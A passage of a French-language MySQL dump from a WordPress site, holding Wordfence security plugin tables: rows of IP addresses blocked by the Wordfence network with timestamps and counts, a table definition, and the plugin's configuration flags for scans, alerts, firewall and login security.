(700515628, 1496014517, 'Blocked by Wordfence Security Network', 1496014518, 1, 1, 0),
(1539837113, 1496016405, 'Blocked by Wordfence Security Network', 1496016424, 20, 1, 0),
(96963116, 1496807811, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2734175325, 1496125580, 'Blocked by Wordfence Security Network', 1496125584, 1, 1, 0),
(1049988935, 1496512596, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(788319630, 1496707085, 'Blocked by Wordfence Security Network', 1496707086, 2, 1, 0),
(1707700163, 1496597512, 'Blocked by Wordfence Security Network', 1496597514, 2, 1, 0),
(1266634707, 1496355424, 'Blocked by Wordfence Security Network', 1496355426, 1, 1, 0),
(1728496878, 1496843770, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1539836946, 1496483793, 'Blocked by Wordfence Security Network', 1496483797, 10, 1, 0),
(1539837082, 1496525607, 'Blocked by Wordfence Security Network', 1496525726, 1773, 1, 0),
(874456664, 1496597937, 'Blocked by Wordfence Security Network', 1496597938, 1, 1, 0),
(1307193800, 1496600286, 'Blocked by Wordfence Security Network', 1496600289, 4, 1, 0),
(2833926914, 1496614560, 'Blocked by Wordfence Security Network', 1496614564, 4, 1, 0),
(1168352192, 1496778654, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1984277895, 1496708591, 'Blocked by Wordfence Security Network', 1496708594, 1, 1, 0),
(2014968716, 1496711601, 'Blocked by Wordfence Security Network', 1496711603, 1, 1, 0),
(1053979479, 1498015746, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2745977144, 1496810373, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1109513350, 1496810935, 'Blocked by Wordfence Security Network', 1496810937, 1, 1, 0),
(3741061572, 1496831095, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2065606982, 1496904688, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1601092177, 1496919771, 'Blocked by Wordfence Security Network', 1496919773, 1, 1, 0),
(136172254, 1497016384, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3063980351, 1497039434, 'Blocked by Wordfence Security Network', 1497039440, 4, 1, 0),
(1985724027, 1497055578, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1732504327, 1497145391, 'Blocked by Wordfence Security Network', 1497145394, 1, 1, 0),
(1840808480, 1497192285, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2032808987, 1497197627, 'Blocked by Wordfence Security Network', 1497197883, 470, 1, 0),
(3682725338, 1498580820, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1547655939, 1497886873, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3233382727, 1497469361, 'Blocked by Wordfence Security Network', 1497469363, 1, 1, 0),
(2037512030, 1497470314, 'Blocked by Wordfence Security Network', 1497470317, 4, 1, 0),
(842965026, 1497471594, 'Blocked by Wordfence Security Network', 1497471599, 1, 1, 0),
(528486593, 1497478743, 'Blocked by Wordfence Security Network', 1497478746, 4, 1, 0),
(3386002506, 1497481887, 'Blocked by Wordfence Security Network', 1497481891, 4, 1, 0),
(1053979353, 1497483124, 'Blocked by Wordfence Security Network', 1497483126, 4, 1, 0),
(3231737508, 1497501917, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1741681534, 1497506948, 'Blocked by Wordfence Security Network', 1497506952, 4, 1, 0),
(1814215517, 1497526219, 'Blocked by Wordfence Security Network', 1497526221, 4, 1, 0),
(1868300323, 1497534874, 'Blocked by Wordfence Security Network', 1497534877, 4, 1, 0),
(3743340614, 1497543679, 'Blocked by Wordfence Security Network', 1497543682, 4, 1, 0),
(1833145697, 1497543771, 'Blocked by Wordfence Security Network', 1497543773, 4, 1, 0),
(2996915206, 1497551181, 'Blocked by Wordfence Security Network', 1497551184, 4, 1, 0),
(3583324972, 1497570048, 'Blocked by Wordfence Security Network', 1497570051, 4, 1, 0),
(1892867061, 1497572490, 'Blocked by Wordfence Security Network', 1497572494, 4, 1, 0),
(2050666736, 1497588364, 'Blocked by Wordfence Security Network', 1497588367, 4, 1, 0),
(1476942175, 1497599574, 'Blocked by Wordfence Security Network', 1497599577, 4, 1, 0),
(2192896078, 1497610649, 'Blocked by Wordfence Security Network', 1497610651, 4, 1, 0),
(1892747498, 1497648465, 'Blocked by Wordfence Security Network', 1497648469, 4, 1, 0),
(1439252880, 1497656260, 'Blocked by Wordfence Security Network', 1497656262, 4, 1, 0),
(1517874559, 1497656696, 'Blocked by Wordfence Security Network', 1497656698, 4, 1, 0),
(3032436716, 1497662623, 'Blocked by Wordfence Security Network', 1497662626, 4, 1, 0),
(3358968011, 1497662926, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3532827868, 1497663112, 'Blocked by Wordfence Security Network', 1497663116, 4, 1, 0),
(1442374564, 1497677119, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2875375532, 1497677735, 'Blocked by Wordfence Security Network', 1497677740, 4, 1, 0),
(3154288046, 1497684857, 'Blocked by Wordfence Security Network', 1497684859, 4, 1, 0),
(657627066, 1497685847, 'Blocked by Wordfence Security Network', 1497685850, 4, 1, 0),
(418884769, 1497688593, 'Blocked by Wordfence Security Network', 1497688596, 4, 1, 0),
(1521628389, 1497702817, 'Blocked by Wordfence Security Network', 1497702819, 4, 1, 0),
(3115319218, 1497707531, 'Blocked by Wordfence Security Network', 1497707533, 4, 1, 0),
(2975005806, 1497723937, 'Blocked by Wordfence Security Network', 1497723940, 4, 1, 0),
(1516638931, 1497745221, 'Blocked by Wordfence Security Network', 1497745227, 4, 1, 0),
(1705472359, 1497763615, 'Blocked by Wordfence Security Network', 1497763618, 4, 1, 0),
(704366584, 1497768413, 'Blocked by Wordfence Security Network', 1497768426, 4, 1, 0),
(1892043087, 1497775806, 'Blocked by Wordfence Security Network', 1497775810, 4, 1, 0),
(3318955358, 1497781902, 'Blocked by Wordfence Security Network', 1497781905, 4, 1, 0),
(3583324965, 1497789746, 'Blocked by Wordfence Security Network', 1497789748, 4, 1, 0),
(2979849631, 1497792073, 'Blocked by Wordfence Security Network', 1497792077, 4, 1, 0),
(1293700813, 1497795807, 'Blocked by Wordfence Security Network', 1497795810, 4, 1, 0),
(703027240, 1497821653, 'Blocked by Wordfence Security Network', 1497821656, 4, 1, 0),
(1935748769, 1497821831, 'Blocked by Wordfence Security Network', 1497821834, 4, 1, 0),
(1700951514, 1497825049, 'Blocked by Wordfence Security Network', 1497825052, 4, 1, 0),
(1336721696, 1497825600, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2376729141, 1497832841, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2946418994, 1497837207, 'Blocked by Wordfence Security Network', 1497837211, 4, 1, 0),
(1675930294, 1497846558, 'Blocked by Wordfence Security Network', 1497846563, 4, 1, 0),
(1539837014, 1497846596, 'Blocked by Wordfence Security Network', 1497846631, 91, 1, 0),
(2970345110, 1497851093, 'Blocked by Wordfence Security Network', 1497851096, 4, 1, 0),
(3124507901, 1497874937, 'Blocked by Wordfence Security Network', 1497874942, 4, 1, 0),
(1332056195, 1497890300, 'Blocked by Wordfence Security Network', 1497890302, 4, 1, 0),
(1451215676, 1497897223, 'Blocked by Wordfence Security Network', 1497897226, 4, 1, 0),
(1442664703, 1497918262, 'Blocked by Wordfence Security Network', 1497918265, 4, 1, 0),
(2946425103, 1497918637, 'Blocked by Wordfence Security Network', 1497918660, 4, 1, 0),
(3207991142, 1497925567, 'Blocked by Wordfence Security Network', 1497925571, 4, 1, 0),
(2982565155, 1497925775, 'Blocked by Wordfence Security Network', 1497925781, 4, 1, 0),
(1733567786, 1497926129, 'Blocked by Wordfence Security Network', 1497926133, 4, 1, 0),
(1892921625, 1497944722, 'Blocked by Wordfence Security Network', 1497944725, 4, 1, 0),
(1466596995, 1497955206, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3192913058, 1497987406, 'Blocked by Wordfence Security Network', 1497987408, 4, 1, 0),
(3374681884, 1498013039, 'Blocked by Wordfence Security Network', 1498013042, 4, 1, 0),
(2945386850, 1498019095, 'Blocked by Wordfence Security Network', 1498019098, 4, 1, 0),
(3661641996, 1498026975, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(832017728, 1498027680, 'Blocked by Wordfence Security Network', 1498027683, 4, 1, 0),
(1337221594, 1498034923, 'Blocked by Wordfence Security Network', 1498034926, 4, 1, 0),
(1556308942, 1498037816, 'Blocked by Wordfence Security Network', 1498037818, 4, 1, 0),
(1021415560, 1498040515, 'Blocked by Wordfence Security Network', 1498040519, 4, 1, 0),
(1337055094, 1498040629, 'Blocked by Wordfence Security Network', 1498040633, 4, 1, 0),
(2945352912, 1498072934, 'Blocked by Wordfence Security Network', 1498072937, 4, 1, 0),
(3305249319, 1498089428, 'Blocked by Wordfence Security Network', 1498089431, 4, 1, 0),
(1442374565, 1498103802, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3139973540, 1498105147, 'Blocked by Wordfence Security Network', 1498105150, 4, 1, 0),
(1091807106, 1498105508, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(19917958, 1498123952, 'Blocked by Wordfence Security Network', 1498123955, 4, 1, 0),
(1829643291, 1498138691, 'Blocked by Wordfence Security Network', 1498138694, 4, 1, 0),
(3171175154, 1498185949, 'Blocked by Wordfence Security Network', 1498185952, 4, 1, 0),
(1239185676, 1498191697, 'Blocked by Wordfence Security Network', 1498191699, 4, 1, 0),
(2630103348, 1498192947, 'Blocked by Wordfence Security Network', 1498192952, 4, 1, 0),
(1113016646, 1498195646, 'Blocked by Wordfence Security Network', 1498195649, 4, 1, 0),
(1676138367, 1498225428, 'Blocked by Wordfence Security Network', 1498225430, 4, 1, 0),
(2867854843, 1498228492, 'Blocked by Wordfence Security Network', 1498228495, 4, 1, 0),
(632957447, 1498235390, 'Blocked by Wordfence Security Network', 1498235393, 4, 1, 0),
(1309960562, 1498256590, 'Blocked by Wordfence Security Network', 1498256592, 4, 1, 0),
(3574948740, 1498260017, 'Blocked by Wordfence Security Network', 1498260019, 4, 1, 0),
(2534459701, 1498260435, 'Blocked by Wordfence Security Network', 1498260437, 4, 1, 0),
(3218485542, 1498261888, 'Blocked by Wordfence Security Network', 1498261891, 4, 1, 0),
(3154283770, 1498304584, 'Blocked by Wordfence Security Network', 1498304587, 4, 1, 0),
(1549150117, 1498308291, 'Blocked by Wordfence Security Network', 1498308293, 4, 1, 0),
(2537022330, 1498336764, 'Blocked by Wordfence Security Network', 1498336767, 4, 1, 0),
(3185558189, 1498340550, 'Blocked by Wordfence Security Network', 1498340552, 4, 1, 0),
(2390016735, 1498348106, 'Blocked by Wordfence Security Network', 1498348108, 4, 1, 0),
(1354011537, 1498350094, 'Blocked by Wordfence Security Network', 1498350097, 4, 1, 0),
(1581398262, 1498350919, 'Blocked by Wordfence Security Network', 1498350922, 4, 1, 0),
(830516292, 1498362315, 'Blocked by Wordfence Security Network', 1498362318, 4, 1, 0),
(1092327198, 1498368497, 'Blocked by Wordfence Security Network', 1498368499, 4, 1, 0),
(1549067217, 1498377155, 'Blocked by Wordfence Security Network', 1498377158, 4, 1, 0),
(1530341882, 1498383988, 'Blocked by Wordfence Security Network', 1498383991, 4, 1, 0),
(1332972736, 1498408310, 'Blocked by Wordfence Security Network', 1498408312, 4, 1, 0),
(1504019374, 1498412516, 'Blocked by Wordfence Security Network', 1498412519, 4, 1, 0),
(3127517827, 1498413084, 'Blocked by Wordfence Security Network', 1498413088, 4, 1, 0),
(1127030815, 1498415976, 'Blocked by Wordfence Security Network', 1498415981, 4, 1, 0),
(759219118, 1498419903, 'Blocked by Wordfence Security Network', 1498419906, 4, 1, 0),
(1484276859, 1498429980, 'Blocked by Wordfence Security Network', 1498429982, 4, 1, 0),
(1348626918, 1498433961, 'Blocked by Wordfence Security Network', 1498433963, 4, 1, 0),
(2042128290, 1498436983, 'Blocked by Wordfence Security Network', 1498436986, 4, 1, 0),
(792045249, 1498466958, 'Blocked by Wordfence Security Network', 1498466961, 4, 1, 0),
(1327704679, 1498473132, 'Blocked by Wordfence Security Network', 1498473134, 4, 1, 0),
(3590217870, 1498494001, 'Blocked by Wordfence Security Network', 1498494003, 4, 1, 0),
(644873987, 1498502671, 'Blocked by Wordfence Security Network', 1498502674, 4, 1, 0),
(2945444222, 1498520871, 'Blocked by Wordfence Security Network', 1498520875, 4, 1, 0),
(3708042678, 1498527976, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3186141464, 1498538584, 'Blocked by Wordfence Security Network', 1498538588, 4, 1, 0),
(1768737787, 1498551664, 'Blocked by Wordfence Security Network', 1498551668, 4, 1, 0),
(2851037189, 1498555788, 'Blocked by Wordfence Security Network', 1498555793, 4, 1, 0),
(3306065029, 1498566126, 'Blocked by Wordfence Security Network', 1498566128, 4, 1, 0),
(1048591873, 1498596170, 'Blocked by Wordfence Security Network', 1498596172, 4, 1, 0),
(1908305645, 1498598411, 'Blocked by Wordfence Security Network', 1498598414, 4, 1, 0),
(755475457, 1498609906, 'Blocked by Wordfence Security Network', 1498609909, 4, 1, 0),
(3293189371, 1498610198, 'Blocked by Wordfence Security Network', 1498610201, 4, 1, 0),
(3216151749, 1498610929, 'Blocked by Wordfence Security Network', 1498610936, 4, 1, 0),
(1539836950, 1500270994, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(84796080, 1498620162, 'Blocked by Wordfence Security Network', 1498620165, 4, 1, 0),
(973497450, 1498621536, 'Blocked by Wordfence Security Network', 1498621539, 4, 1, 0),
(1133404225, 1498671023, 'Blocked by Wordfence Security Network', 1498671028, 4, 1, 0),
(2970975037, 1498688460, 'Blocked by Wordfence Security Network', 1498688463, 4, 1, 0),
(3185120017, 1498689301, 'Blocked by Wordfence Security Network', 1498689304, 4, 1, 0),
(3135207294, 1498697011, 'Blocked by Wordfence Security Network', 1498697014, 4, 1, 0),
(1329042672, 1498841034, 'Blocked by Wordfence Security Network', 1498841039, 4, 1, 0),
(3315981465, 1498854031, 'Blocked by Wordfence Security Network', 1498854034, 4, 1, 0),
(1441124516, 1498854073, 'Blocked by Wordfence Security Network', 1498854076, 4, 1, 0),
(2963878449, 1498868600, 'Blocked by Wordfence Security Network', 1498868604, 4, 1, 0),
(2094473799, 1498879565, 'Blocked by Wordfence Security Network', 1498879569, 4, 1, 0),
(657088345, 1498884446, 'Blocked by Wordfence Security Network', 1498884450, 4, 1, 0),
(2898773830, 1498884924, 'Blocked by Wordfence Security Network', 1498884929, 4, 1, 0),
(1452261118, 1498900870, 'Blocked by Wordfence Security Network', 1498900872, 4, 1, 0),
(694234475, 1498902420, 'Blocked by Wordfence Security Network', 1498902423, 4, 1, 0),
(1317833414, 1498912376, 'Blocked by Wordfence Security Network', 1498912378, 4, 1, 0),
(778276980, 1498927375, 'Blocked by Wordfence Security Network', 1498927377, 4, 1, 0),
(3211865851, 1498941320, 'Blocked by Wordfence Security Network', 1498941323, 4, 1, 0),
(1443044267, 1498949487, 'Blocked by Wordfence Security Network', 1498949491, 4, 1, 0),
(3168301617, 1498949618, 'Blocked by Wordfence Security Network', 1498949620, 4, 1, 0),
(3731698192, 1498959524, 'Blocked by Wordfence Security Network', 1498959527, 4, 1, 0),
(1549936997, 1498962762, 'Blocked by Wordfence Security Network', 1498962764, 4, 1, 0),
(1777049476, 1498967392, 'Blocked by Wordfence Security Network', 1498967395, 4, 1, 0),
(1839458818, 1498969206, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(657922338, 1498970487, 'Blocked by Wordfence Security Network', 1498970491, 4, 1, 0),
(1235922150, 1498977974, 'Blocked by Wordfence Security Network', 1498977977, 4, 1, 0),
(2875283979, 1498990988, 'Blocked by Wordfence Security Network', 1498990991, 4, 1, 0),
(1391229745, 1499006476, 'Blocked by Wordfence Security Network', 1499006479, 4, 1, 0),
(3319952174, 1499017018, 'Blocked by Wordfence Security Network', 1499017021, 4, 1, 0),
(1363303233, 1499031006, 'Blocked by Wordfence Security Network', 1499031008, 4, 1, 0),
(3560722714, 1499039147, 'Blocked by Wordfence Security Network', 1499039150, 4, 1, 0),
(1435830550, 1499041593, 'Blocked by Wordfence Security Network', 1499041596, 4, 1, 0),
(3291887408, 1499045004, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1544811101, 1499045678, 'Blocked by Wordfence Security Network', 1499045681, 4, 1, 0),
(1570530821, 1499049012, 'Blocked by Wordfence Security Network', 1499049015, 4, 1, 0),
(3497108325, 1499063259, 'Blocked by Wordfence Security Network', 1499063260, 1, 1, 0),
(694199286, 1499095491, 'Blocked by Wordfence Security Network', 1499095494, 4, 1, 0),
(694508115, 1499107561, 'Blocked by Wordfence Security Network', 1499107564, 4, 1, 0),
(3033775030, 1499116960, 'Blocked by Wordfence Security Network', 1499116963, 4, 1, 0),
(1307411185, 1499118227, 'Blocked by Wordfence Security Network', 1499118230, 4, 1, 0),
(3135066780, 1499118299, 'Blocked by Wordfence Security Network', 1499118302, 4, 1, 0),
(1800230200, 1499131954, 'Blocked by Wordfence Security Network', 1499131957, 4, 1, 0),
(1040268236, 1499132310, 'Blocked by Wordfence Security Network', 1499132313, 4, 1, 0),
(3561984809, 1499168133, 'Blocked by Wordfence Security Network', 1499168135, 4, 1, 0),
(3104980322, 1499199861, 'Blocked by Wordfence Security Network', 1499199863, 4, 1, 0),
(1807545404, 1499206900, 'Blocked by Wordfence Security Network', 1499206903, 4, 1, 0),
(1768344095, 1499210805, 'Blocked by Wordfence Security Network', 1499210808, 4, 1, 0),
(2955898566, 1499212035, 'Blocked by Wordfence Security Network', 1499212037, 4, 1, 0),
(1550636993, 1499239201, 'Blocked by Wordfence Security Network', 1499239204, 4, 1, 0),
(656512273, 1499239272, 'Blocked by Wordfence Security Network', 1499239275, 4, 1, 0),
(996019409, 1499250375, 'Blocked by Wordfence Security Network', 1499250378, 4, 1, 0),
(771295430, 1499261449, 'Blocked by Wordfence Security Network', 1499261452, 4, 1, 0),
(2970739670, 1499265147, 'Blocked by Wordfence Security Network', 1499265151, 4, 1, 0),
(2631915670, 1499275902, 'Blocked by Wordfence Security Network', 1499275906, 4, 1, 0),
(1081048870, 1499279619, 'Blocked by Wordfence Security Network', 1499279620, 1, 1, 0),
(1510259739, 1499287229, 'Blocked by Wordfence Security Network', 1499287232, 4, 1, 0),
(700942233, 1499287376, 'Blocked by Wordfence Security Network', 1499287379, 4, 1, 0),
(453419362, 1499314822, 'Blocked by Wordfence Security Network', 1499314825, 4, 1, 0),
(3032446933, 1499316663, 'Blocked by Wordfence Security Network', 1499316667, 4, 1, 0),
(2058401108, 1499362597, 'Blocked by Wordfence Security Network', 1499362600, 4, 1, 0),
(2745975732, 1499383619, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3376883719, 1499384738, 'Blocked by Wordfence Security Network', 1499384741, 4, 1, 0),
(3133998086, 1499394278, 'Blocked by Wordfence Security Network', 1499394281, 4, 1, 0),
(1307971246, 1499405973, 'Blocked by Wordfence Security Network', 1499405976, 4, 1, 0),
(1829708752, 1499414006, 'Blocked by Wordfence Security Network', 1499414009, 4, 1, 0),
(3646079390, 1499429490, 'Blocked by Wordfence Security Network', 1499429493, 4, 1, 0),
(2058258280, 1499442606, 'Blocked by Wordfence Security Network', 1499442609, 4, 1, 0),
(2961112076, 1499461065, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1124218043, 1499501952, 'Blocked by Wordfence Security Network', 1499501955, 4, 1, 0),
(84712992, 1499521646, 'Blocked by Wordfence Security Network', 1499521648, 4, 1, 0),
(887721709, 1499521764, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1776310817, 1499555632, 'Blocked by Wordfence Security Network', 1499555635, 4, 1, 0),
(1610237772, 1499562086, 'Blocked by Wordfence Security Network', 1499562089, 4, 1, 0),
(2971068426, 1499563048, 'Blocked by Wordfence Security Network', 1499563051, 4, 1, 0),
(2979847696, 1499573766, 'Blocked by Wordfence Security Network', 1499573769, 4, 1, 0),
(16883149, 1499579491, 'Blocked by Wordfence Security Network', 1499579494, 4, 1, 0),
(837087165, 1499579723, 'Blocked by Wordfence Security Network', 1499579727, 4, 1, 0),
(3197645454, 1499583850, 'Blocked by Wordfence Security Network', 1499583853, 4, 1, 0),
(86730617, 1499583964, 'Blocked by Wordfence Security Network', 1499583967, 4, 1, 0),
(779420885, 1499623230, 'Blocked by Wordfence Security Network', 1499623233, 4, 1, 0),
(1314156440, 1499638406, 'Blocked by Wordfence Security Network', 1499638409, 4, 1, 0),
(2830446697, 1499648688, 'Blocked by Wordfence Security Network', 1499648692, 4, 1, 0),
(3032370800, 1499653013, 'Blocked by Wordfence Security Network', 1499653017, 4, 1, 0),
(2047078917, 1499654903, 'Blocked by Wordfence Security Network', 1499654906, 4, 1, 0),
(1743248074, 1499655683, 'Blocked by Wordfence Security Network', 1499655688, 4, 1, 0),
(1287217583, 1499655715, 'Blocked by Wordfence Security Network', 1499655718, 4, 1, 0),
(1892904470, 1499656486, 'Blocked by Wordfence Security Network', 1499656490, 4, 1, 0),
(36889934, 1499670007, 'Blocked by Wordfence Security Network', 1499670010, 4, 1, 0),
(1333864093, 1499692280, 'Blocked by Wordfence Security Network', 1499692283, 4, 1, 0),
(3526612805, 1499724466, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1410847463, 1499734210, 'Blocked by Wordfence Security Network', 1499734213, 4, 1, 0),
(1321684459, 1499746334, 'Blocked by Wordfence Security Network', 1499746336, 4, 1, 0),
(1326068261, 1499788092, 'Blocked by Wordfence Security Network', 1499788094, 4, 1, 0),
(792007333, 1499809617, 'Blocked by Wordfence Security Network', 1499809620, 4, 1, 0),
(3321488109, 1499818437, 'Blocked by Wordfence Security Network', 1499818441, 4, 1, 0),
(1326228420, 1499820445, 'Blocked by Wordfence Security Network', 1499820448, 4, 1, 0),
(1471709157, 1499853773, 'Blocked by Wordfence Security Network', 1499853775, 4, 1, 0),
(2393026044, 1499868369, 'Blocked by Wordfence Security Network', 1499868372, 4, 1, 0),
(2152704098, 1499886809, 'Blocked by Wordfence Security Network', 1499886811, 4, 1, 0),
(42616701, 1499890032, 'Blocked by Wordfence Security Network', 1499890034, 4, 1, 0),
(1581302042, 1499900484, 'Blocked by Wordfence Security Network', 1499900487, 4, 1, 0),
(1235952074, 1499918354, 'Blocked by Wordfence Security Network', 1499918356, 4, 1, 0),
(915750734, 1499950981, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(874674276, 1499961687, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3481717135, 1499965444, 'Blocked by Wordfence Security Network', 1499965447, 4, 1, 0),
(583622267, 1499989888, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3197462569, 1499993182, 'Blocked by Wordfence Security Network', 1499993185, 4, 1, 0),
(2927706329, 1499993631, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(702461109, 1499994082, 'Blocked by Wordfence Security Network', 1499994085, 4, 1, 0),
(920891349, 1500001332, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(585452219, 1500205955, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3577295515, 1500011864, 'Blocked by Wordfence Security Network', 1500011867, 4, 1, 0),
(455217818, 1500023470, 'Blocked by Wordfence Security Network', 1500023473, 4, 1, 0),
(1337027635, 1500048293, 'Blocked by Wordfence Security Network', 1500048296, 4, 1, 0),
(634555953, 1500054931, 'Blocked by Wordfence Security Network', 1500054934, 4, 1, 0),
(404453904, 1500062586, 'Blocked by Wordfence Security Network', 1500062589, 4, 1, 0),
(692377094, 1500063161, 'Blocked by Wordfence Security Network', 1500063165, 4, 1, 0),
(1376975531, 1500073515, 'Blocked by Wordfence Security Network', 1500073518, 4, 1, 0),
(3141400205, 1500087266, 'Blocked by Wordfence Security Network', 1500087270, 4, 1, 0),
(585330554, 1500087688, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1293927825, 1500094419, 'Blocked by Wordfence Security Network', 1500094422, 4, 1, 0),
(835573799, 1500095941, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1976044991, 1500106175, 'Blocked by Wordfence Security Network', 1500106179, 4, 1, 0),
(1297608708, 1500106398, 'Blocked by Wordfence Security Network', 1500106400, 4, 1, 0),
(874893407, 1500126458, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(585291184, 1500152033, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3319954936, 1500160451, 'Blocked by Wordfence Security Network', 1500160454, 4, 1, 0),
(3042655538, 1500169905, 'Blocked by Wordfence Security Network', 1500169908, 4, 1, 0),
(3361094801, 1500178800, 'Blocked by Wordfence Security Network', 1500178804, 4, 1, 0),
(919161641, 1500178945, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1678835878, 1500181716, 'Blocked by Wordfence Security Network', 1500181718, 4, 1, 0),
(1744517895, 1500185547, 'Blocked by Wordfence Security Network', 1500185550, 4, 1, 0),
(584188065, 1500224743, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1887841908, 1500264744, 'Blocked by Wordfence Security Network', 1500264747, 4, 1, 0),
(1539428482, 1500281761, 'Blocked by Wordfence Security Network', 1500281764, 4, 1, 0),
(874738092, 1500333061, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1729078788, 1500314583, 'Blocked by Wordfence Security Network', 1500314586, 4, 1, 0),
(3164695660, 1500326083, 'Blocked by Wordfence Security Network', 1500326086, 4, 1, 0),
(1855096721, 1500346158, 'Blocked by Wordfence Security Network', 1500346162, 4, 1, 0),
(1237999338, 1500346277, 'Blocked by Wordfence Security Network', 1500346281, 4, 1, 0),
(598145435, 1500357616, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1422229100, 1500365654, 'Blocked by Wordfence Security Network', 1500365656, 4, 1, 0),
(598069797, 1500376266, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(885815617, 1500386439, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3680266720, 1500390057, 'Blocked by Wordfence Security Network', 1500390060, 4, 1, 0),
(1324837478, 1500397437, 'Blocked by Wordfence Security Network', 1500397439, 4, 1, 0),
(911757147, 1500397669, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3410419836, 1500411035, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3269181341, 1500415346, 'Blocked by Wordfence Security Network', 1500415348, 4, 1, 0),
(3120616689, 1500444655, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3114828415, 1500446782, 'Blocked by Wordfence Security Network', 0, 0, 1, 0);

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfBlocksAdv`
--

CREATE TABLE `wp_wfBlocksAdv` (
  `id` int(10) UNSIGNED NOT NULL,
  `blockType` char(2) NOT NULL,
  `blockString` varchar(255) NOT NULL,
  `ctime` int(10) UNSIGNED NOT NULL,
  `reason` varchar(255) NOT NULL,
  `totalBlocked` int(10) UNSIGNED DEFAULT '0',
  `lastBlocked` int(10) UNSIGNED DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfConfig`
--

CREATE TABLE `wp_wfConfig` (
  `name` varchar(100) NOT NULL,
  `val` longblob
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_wfConfig`
--

INSERT INTO `wp_wfConfig` (`name`, `val`) VALUES
('alertOn_critical', 0x31),
('alertOn_update', 0x30),
('alertOn_warnings', 0x31),
('alertOn_throttle', 0x30),
('alertOn_block', 0x31),
('alertOn_loginLockout', 0x31),
('alertOn_lostPasswdForm', 0x31),
('alertOn_adminLogin', 0x31),
('alertOn_nonAdminLogin', 0x30),
('liveTrafficEnabled', 0x31),
('advancedCommentScanning', 0x30),
('checkSpamIP', 0x30),
('spamvertizeCheck', 0x30),
('liveTraf_ignorePublishers', 0x31),
('scheduledScansEnabled', 0x31),
('scansEnabled_public', 0x30),
('scansEnabled_heartbleed', 0x31),
('scansEnabled_core', 0x31),
('scansEnabled_themes', 0x30),
('scansEnabled_plugins', 0x30),
('scansEnabled_malware', 0x31),
('scansEnabled_fileContents', 0x31),
('scansEnabled_posts', 0x31),
('scansEnabled_comments', 0x31),
('scansEnabled_passwds', 0x31),
('scansEnabled_diskSpace', 0x31),
('scansEnabled_options', 0x31),
('scansEnabled_dns', 0x31),
('scansEnabled_scanImages', 0x30),
('scansEnabled_highSense', 0x30),
('scansEnabled_oldVersions', 0x31),
('firewallEnabled', 0x31),
('blockFakeBots', 0x30),
('autoBlockScanners', 0x31),
('loginSecurityEnabled', 0x31),
('loginSec_lockInvalidUsers', 0x30),
('loginSec_maskLoginErrors', 0x31),
('loginSec_blockAdminReg', 0x31),
('loginSec_disableAuthorScan', 0x31),
('other_hideWPVersion', 0x31),
('other_noAnonMemberComments', 0x31),
('other_blockBadPOST', 0x30),
('other_scanComments', 0x31),
('other_pwStrengthOnUpdate', 0x31),
('other_WFNet', 0x31),
('other_scanOutside', 0x30),
('deleteTablesOnDeact', 0x30),
('autoUpdate', 0x30),
('disableCookies', 0x30),
('startScansRemotely', 0x30),
('addCacheComment', 0x30),
('disableCodeExecutionUploads', 0x30),
('allowHTTPSCaching', 0x30),
('debugOn', 0x30),
('email_summary_enabled', 0x31),
('email_summary_dashboard_widget_enabled', 0x31),
('securityLevel', 0x32),
('alertEmails', ''),
('liveTraf_ignoreUsers', ''),
('liveTraf_ignoreIPs', ''),
('liveTraf_ignoreUA', ''),
